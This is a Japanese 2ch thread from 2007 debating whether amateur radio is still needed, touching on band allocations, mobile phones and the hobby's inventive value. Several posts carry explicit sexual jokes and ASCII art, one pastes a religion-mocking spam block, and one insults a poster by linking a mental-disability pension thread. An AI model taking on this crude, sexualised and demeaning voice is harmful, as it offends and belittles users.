126 :名無しさんから2ch各局…:2007/09/02(日) 19:56:35
不要ではない

127 :名無しさんから2ch各局…:2007/09/02(日) 20:01:29
オナニーはセックスをすればいいから不要

128 :名無しさんから2ch各局…:2007/09/02(日) 20:02:16
目茶苦茶不要。
短波帯だけで我慢しろ。
VHFは即刻返上で問題ない。

129 :名無しさんから2ch各局…:2007/09/02(日) 20:02:41

http://tgc.jp-au.net/rollcall-summary2007.html


130 :名無しさんから2ch各局…:2007/09/02(日) 20:03:20
不要ではない

131 :名無しさんから2ch各局…:2007/09/02(日) 20:06:12
ではUHF(435)やSHF(1200)をしよう。


















そのあとVHF(144)。

132 :名無しさんから2ch各局…:2007/09/02(日) 20:06:19
オナニーはセックスとは異なる快感がある

133 :名無しさんから2ch各局…:2007/09/02(日) 20:07:41
オナニーってしたことない。
セックスは数え切れない程した。

134 :>>119:2007/09/02(日) 20:10:08
>>128君。
>>131だって。

135 :名無しさんから2ch各局…:2007/09/02(日) 20:11:52
無線はオナニーが


  キホン

136 :名無しさんから2ch各局…:2007/09/02(日) 20:13:32
>>131
以上って書くの忘れた。
そこらあたりも返上して。
無線タグで使うから。


137 :名無しさんから2ch各局…:2007/09/02(日) 20:14:21

http://tgc.jp-au.net/rollcall-summary2007.html


138 :名無しさんから2ch各局…:2007/09/02(日) 20:26:36
オナニーはセックすを知らない幼稚園がすること

139 :オナニー:2007/09/02(日) 20:37:20
       __     /
      /⌒ ヽ  /        /
      (     )'゙ヽ.     _/
.    /iー-‐'"i    ,;   /
  i ! ( ヽ.    )  ノ/ .:/
    (\.゙ヽ_(_/,イ/
  i ! (\\_,_)' ノ
    (\\_,_,)'
  i !  l ,i\ ヽ、 !  シュッ! シュッ! シュッ!
     し'

140 :名無しさんから2ch各局…:2007/09/02(日) 20:38:44
所詮尼無線家nの精神年齢はこんな物か。
やっぱり不要。

141 :セックス:2007/09/02(日) 20:38:49
          l     ,'  l   l
          ,'     ,'   l  l          . - _
       // ,'      ,'_,..,_ l,  ヽ     ノ´//⌒ ミヾヽ、_ ィィ・・イキソウ・・・
     //,r'´     ,r'´   `ヽ、、、`;ニ三彡´〃   ! ゙ゞヾ、_`ヽ
     (({ グチュ {       ````  /´  {  l  | // ヽ`ーr' }
  パン パン ! ズチャ !    `、     '   ノ  l. ||l     i l / l
       ',     ; ',      | ̄``''''ー―- ,'´l  l |!` ‐--| l l l
         ',     l ',    |             l  l  |    リ,! l
       i     ; ',   |          | | ,!    ' リ
,,,,--−---、ノ     ,'___',   |          |. |    ゚。
           ,'' ´ `ヽ   !         | |
、、....___ .....,r'-......__ ,.r'             | '''"''‐-、

142 :セックスとオナニー:2007/09/02(日) 20:43:54
オナニーとセックス違いは?

143 :名無しさんから2ch各局…:2007/09/02(日) 20:44:29
オーバーパワーでちんちんシュシュシュ

とオナニーオヤジ大杉

144 :名無しさんから2ch各局…:2007/09/02(日) 20:45:25
□創価学会∩□天下取り□□□■池田センセイが2げっと■■■□□国立戒壇□□王仏冥合□□□□
    |  ゝノ         池田先生のスピーチはこちら  http://www.toride.org/real/real.htm
   __|_______|_      ____      
  |iiiiiiiiiiiiiiiii|   /ヾ   ;; ::≡=-_ ナニヤッテンダヨ!アキヤァ!
  |iiiiiiiiiiiiiiiii| /:::ヾ          \ >>3 うーんと口を誤魔化して折伏戦に励んで下さい。
  |iiiiiiiiiiiiiiiii||::::::|             |   >>4 あっ、それと警察には捕まらないようにね。
  |iiiiiiiiiiiiiiii|ヽ;;;;;|   -==≡ミノノノ ≡=-|ミ  >>5 早く都市部に中選挙区制を導入しなさい!
  |iiiiiiiiiiiiiiii|/ヽ ──|  ● | ̄| ●  || >>6 ウーマン、イトマン、キンマンコ!
  |iiiiiiiiiiiiiiii|ヽ <     \_/ ヽ_/|   >>7 んもー、年金から財務させなさいっ!
  |iiiiiiiiiiiiiiii|ヽ|       /(    )\ ヽ  >>8 福永法源も貰ったガンジー平和賞ですよ!
  |iiiiiiiiiiiiiiii|| (        ` ´  |  |  >>9 今度の選挙は公明党をよろしくね。車で迎えに行くから。
  |iiiiiiiiiiiiiiiiii|  ヽ  \_/\/ヽ/  |  >>10 マッハロー!!!
  \iiiiiiiiiiiiiiiヽ  ヽ   \  ̄ ̄/  /  >>11 学会に入らないと不幸になるよ、本当だよ。
    \iiiiiiiiiiiii\  \    ̄ ̄  /   >>12 学会を辞めると不幸になるよ、本当だよ。
     |iiiiiiiiiiiiiiiiiii|_   ̄ ̄ ̄ ̄/




145 :名無しさんから2ch各局…:2007/09/02(日) 20:48:52
                   /  i!
                   ,. -'- -,,._-ーー ー--,
  ハァ     し・・・・・しぃ   ,;' u   u  ,,   , '
                 ;   ,ー、    '; , ''
                , ' ,ー-; ー'   u i!"
        ハァ        ヽi   i u  u   ノ
                  ''ー-'.,.,__    'ー 、
                  ヾ    |  u   ヽ
                       i!    u i!
                   ミ  _.ノ u;      ;,
       l"'ヽ,,          /" i   ノ  u/  ';,
       i!   ';;   ,, -''"';   ,,'-ー'"ー;"    i  uヽ_ _
 ん・・あ ,;'" u'"""''    ノ , '"u  ゚ "-,,_..,;.' o  三
      ;'u   _  u ヽ;'ー"     _,., o ヽ。u   ノ ̄
     ;' ー-  '-'    ,;-ー' u   =   三'"    ',二 ̄
    i ! ヽ, u ""  ;j '  u    二=  -,;,ヽ,°    ';
    ヾミ  "'- ..,.,...__,..- ノ     ..-ー|     i!ヽ.._;; u  ヽ
 ギコ・・・くん  ((.  ノu   / u /フ"  ';   三二 ";    '
         /  /u  '; "ー--'"i u  ,ノ   'ー-=-'"
        "'ー--;'    ,ノ      l,   /
            "'ー'''"       "'' '"

146 :名無しさんから2ch各局…:2007/09/02(日) 20:49:41
         l::..       |        l
          l      l       l
  ニニニ 7   ',       l        ノ  | | | |  _
    //     ',       |      /  | |  | レ' /
    .//ヽヽ   |     |     /   |_|   |/
   //  \> ゙ノ'、    , |      l
           ,/   ン 人   ,  {
         { {    / lヽ  ノ l
        ハヽ   /、 l ::::   l
        l ヽ∀⌒ i、|      l
        |  \ ー'^) |      l
        |   lヽ、 ,' )       }
       ({   ノ) \i `ー、___,,,ノ )
       (ヽ`ー'ノ)   `ヽ、 -'' .ノ|
      {\_二イ      |`ー''゙ |
      ノニ/二l ノ. . .     l    |
     / /::::::::} l: : : : : . . : : :.|   |
    /` i二ニ/_.ノ: : : : : : : : / !   |`)
     ヽ、 !::::::! /: : : : : : : : : 〉、`ー''"ソ )
     `ー--'': : :   : : : : <、_`- _,,ノヽ
                 ! lミミイ /  ): : . . .
                ノ ン二{ { ,'/: : : : :
               / ノ:::::::ノ,,, lイ: : : : : : :
               ,' /- ニ/、 ノ}: : : : : : :
               { _i:::::::i_,, ノノ
               `ーニニニン

147 :名無しさんから2ch各局…:2007/09/02(日) 20:58:53
       // ,'      ,'_,..,_ l,  ヽ     ノ´//⌒ ミヾヽ、_ ィィ・・イキソウ・・・
     //,r'´     ,r'´   `ヽ、、、`;ニ三彡´〃   ! ゙ゞヾ、_`ヽ
     (({ グチュ {       ````  /´  {  l  | // ヽ`ーr' }
  パン パン ! ズチャ !    `、     '   ノ  l. ||l     i l / l
       ',     ; ',      | ̄``''''ー―- ,'´l  l |!` ‐--| l l l


148 :名無しさんから2ch各局…:2007/09/02(日) 21:00:00
    .//ヽヽ   |     |     /   |_|   |/
   //  \> ゙ノ'、    , |      l
           ,/   ン 人   ,  {
         { {    / lヽ  ノ l
        ハヽ   /、 l ::::   l
        l ヽ∀⌒ i、|      l
        |  \ ー'^) |      l


149 :名無しさんから2ch各局…:2007/09/02(日) 21:05:16
http://www.goo-net.com/used/spread/goo/13/0110070901B4000694003.html

150 :名無しさんから2ch各局…:2007/09/02(日) 22:03:12
ガイシュツかと思うが言う。
アマ無線は通信そのものに実用価値はほとんどない。
アマ無線は実用通信というより、趣味教養だ。
中学でいえば、国語、英語、体育みたいなもんかな。
理科離れをわずかでも押さえ、人生でたまたま必要になる理科知識に
応じる基礎教養、でなきゃ、たまたま役立つ保険みたいなものだ。
みなさん、中学の数学、理科、日本史、音楽などが、実社会で何か役にたったか?
多分、役に立った経験はまずなかろうよ。
しかし、中学で無駄だからと、理科や音楽をやめてほしくはないな。
オレはやっててやっぱりよかったと思っている。

151 :名無しさんから2ch各局…:2007/09/03(月) 03:11:26
不要ではない

152 :名無しさんから2ch各局…:2007/09/04(火) 17:54:52
不要ではない

153 :名無しさんから2ch各局…:2007/09/04(火) 17:57:49
不要です。なくても誰も困らない

154 :名無しさんから2ch各局…:2007/09/04(火) 18:00:39
>>153 なら無線板に来るな。


155 :名無しさんから2ch各局…:2007/09/04(火) 18:17:34
ないとオレが困るな。したがって「誰も困らない」はUSO800だ。

156 :名無しさんから2ch各局…:2007/09/04(火) 20:12:40
ケータイがあるから不要
はっきり言って時代遅れ


157 :名無しさんから2ch各局…:2007/09/05(水) 02:50:01
またケータイ房か
だから一つの連絡手段として考えないで、
電波を使った趣味として考えればいいんだよ。
俺もケータイないと生きていけないと思うし。

158 :名無しさんから2ch各局…:2007/09/05(水) 05:37:53
>>155
USO800ではだめだ、いまはISO2000ぐらい取得してないとな。





159 :名無しさんから2ch各局…:2007/09/05(水) 20:00:58
>>156
ケータイで話すのもいいが、ケータイ改造して別のケータイ作るのもいいぞ
おまえにはできんだろー

160 :名無しさんから2ch各局…:2007/09/05(水) 20:02:04
>>159に最適なスレに誘導します

精神障害年金2級で暮らしている人のスレ

http://life8.2ch.net/test/read.cgi/okiraku/1169314986/l50

161 :名無しさんから2ch各局…:2007/09/06(木) 01:22:21
ジャンクの携帯をアマ機に改造してアマバンドで使うのは違法か?

162 :名無しさんから2ch各局…:2007/09/06(木) 04:27:10
不要としかいいようがないけど、
無線人口も減ったことだし帯域幅大幅減で良いんじゃないの?
各周波数帯1/10位がちょうど良いかも。


163 :名無しさんから2ch各局…:2007/09/06(木) 10:27:03
>>162
通信の実用性だけしか考えないアフォ
アマ無線は実用通信じゃない。趣味教養なのら
周波数帯を削ることはないよ
キタナイ金儲けが増えるだけ、

164 :名無しさんから2ch各局…:2007/09/06(木) 10:33:11
>>162
反対に7Mは、増えるぞ

165 :お祭り好きの電氣屋  ◆gUNjnLD0UI :2007/09/06(木) 13:40:09
 テレビディジタル化した後、開いたVHF対の一部を尼に開放ってうわさは
本当なのか?

166 :名無しさんから2ch各局…:2007/09/06(木) 18:55:33
2011年ディジタル化のあと、BCからHFのプロ局はどうなるの?



167 :名無しさんから2ch各局…:2007/09/06(木) 18:56:34
166ですが「プロ局」と描いたのは商業局です

168 :乃木坂信長:2007/09/08(土) 22:13:31
ヘー 嘘つきが。

169 :名無しさんから2ch各局…:2007/09/08(土) 23:22:41
もはや不要。
必要なら利用者が右肩上がりで増えていくはず。
現状では利用者が急激に減っていて歯止めが掛からない。
もはや存在理由が無くなりつつある。
またデジタル方式など周波数の利用効率を高める努力もしないで、
未だに広帯域を我が物顔で使用している。
話している内容もインターネット若しくは携帯電話で済むような内容ばかり。
周波数を返上して必要とされている所に再配分されるべき。



170 :乃木坂信長:2007/09/09(日) 00:09:31
>>169それは435などのFMなどの話だろ?
7メガヘルツなんかはデジタルでは面白みがないぞ。
第一に無線でやるから意味がある。
デジタルなんかは雑音のなか聞くことはできない。
シグナル(感度)が高くないと聞こえない。
それでは面白くないだろ?
言葉が下手ですいません。
ゆとり世代なんでm(__)m

171 :名無しさんから2ch各局…:2007/09/09(日) 00:27:22
>>170
ごめん俺も言いすぎた。

172 :名無しさんから2ch各局…:2007/09/09(日) 00:49:47
>>165
144,430の惨状をどうにかしないと分配はされることはないだろ
うな

173 :ほしいもジョニー:2007/09/09(日) 01:30:48
>>172 まあなすぐに別のに分配しても、違法トラックやアンカバーが妨害をしだすだろう。
無線機メーカーも危うい。特にアルインコなんか。


http://wibo.m78.com/clip/clip.cgi

174 :名無しさんから2ch各局…:2007/09/09(日) 09:29:52
個人で実験、研究中に新しいアンテナやらなにかしらの発見がされないとも限らない。
だから今後も継続して残していくべく分野だと思うが。
周波数も海外との兼ね合いもあるからもっと開放されてもおかしくないと思う。


175 :名無しさんから2ch各局…:2007/09/09(日) 13:50:12
>>169
必要なら増えてくるというがその逆もいっぱいある
人がやるから自分もやるというだけでは
世の中発展しないし、新しいものは生まれないよ。
青色LEDは、他人がやらない材料・結晶法を選んで成功した。
オレが大発明できるわけではないが
せめて大発明するヤツの仲間でいたいとおもってもいいだろう。

176 :名無しさんから2ch各局…:2007/09/12(水) 13:16:08
アマチュアバンドは公園みたいなもん
それがあっても儲かるもんではないが、息抜きできるバンド

177 :名無しさんから2ch各局…:2007/09/12(水) 21:18:00
>>176
その感覚でいくと、7MHzなんてホームレスが沢山居る新宿中央公園か?
息抜き出来る場所も有るが、息抜き出来ない場所が多い。

178 :名無しさんから2ch各局…:2007/09/12(水) 21:33:55
176 SAY
理想論なんで、アマバンド内のホームレスはたしかに困る罠


179 :名無しさんから2ch各局…:2007/09/16(日) 15:48:08
利用者減少・・・・・ですか

もともと、増えたのには原因があるようです。
今は携帯電話が凄く多くなってきているので
携帯電話代わりに使っていた方が・・・離れていったのですね。

と、思っているのですが・・・・・・・・なにか?

180 :名無しさんから2ch各局…:2007/09/16(日) 18:51:54
携帯代わりに使っていた人が減ったのはいいが、
反面、ロクでもないのが凝縮されて残ったという感じ。

181 :名無しさんから2ch各局…:2007/09/17(月) 01:43:45
もともと携帯はアマ無銭の代わりではない
もともとアマ無銭は携帯の代わりではない
ただ、携帯とアマ無銭は同じような物と勘違いしてる香具師が
学舎や役人の中に、たくさんいることは確かだ。
もっとこまるのは、アマ無銭家にも、たくさんいることだ。


182 :名無しさんから2ch各局…:2007/09/21(金) 23:45:01
いらん


意味の無い免許制度がねw

183 :名無しさんから2ch各局…:2007/09/22(土) 13:11:02
アマチュアとは素人の意味ですか

184 :名無しさんから2ch各局…:2007/09/26(水) 12:28:24
アマレスは素人のレスリングの意味ですか

185 :名無しさんから2ch各局…:2007/10/01(月) 10:42:03
プロ・メーカーは安全で儲かる技術しか採用しない
(それでも時々間違う)
アマは、危なくて、儲からない技術でもかまわず採用する
(やってみたらスゴイというものが1000にひとつ位ある)
1000にひとつでも、アマチュアがいないと見つからないものが見つかれば、
アマチュアの試みは無駄でなかったことになる。
いま実効されている技術の多くは、長い間アマチュアがバカにされながら
発明したり、改良したりしてきたものだよ。


186 :名無しさんから2ch各局…:2007/10/01(月) 10:57:43
ただこれからは期待できないんじゃない?

187 :お祭り好きの電氣屋  ◆gUNjnLD0UI :2007/10/01(月) 11:18:50
 そうでもないぞ。 パケット通信だって今じゃ携帯で当たり前に使ってるけど
アマチュア無線家が無線でパソコンデーター飛ばそうと思っって実験を繰り返していた
頃は基地外の奇行扱いだったろ。

188 :名無しさんから2ch各局…:2007/10/01(月) 12:04:39
いつの時代でも>>186みたいなこというやつはいるさ。
いわなくても、人々はそう思ってるさ
しかし「できないという証明」はできないさ。
結果として長期間、誰も期待される成果をあげなかったという歴史は、
長期間ののち誰かが成果をあげて、歴史を覆すからな。
というわけで、オレも希望をもってセコセコやってるのだ。
それだけの話。他人に期待してくれとは期待しないから。

189 :名無しさんから2ch各局…:2007/10/01(月) 12:11:01
日本のアマチュアは、ミャンマーの坊さんよりは恵まれていると思う。

190 :名無しさんから2ch各局…:2007/10/01(月) 12:13:11
189
その証拠に、ハラ怪鳥の悪口いっても逮捕はされない。

191 :名無しさんから2ch各局…:2007/10/06(土) 16:04:37
ミャンマーの宗教団体はミャマーの人民のために働かないのか脳
いつまでもミャンマーの軍事政府のいいなりになっってていいのか脳


192 :名無しさんから2ch各局…:2007/10/06(土) 16:07:44
日本の神道は自民党のいいなりか
自民党が新党のいいなりか

193 :名無しさんから2ch各局…:2007/10/06(土) 16:08:38
稲荷神社?

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)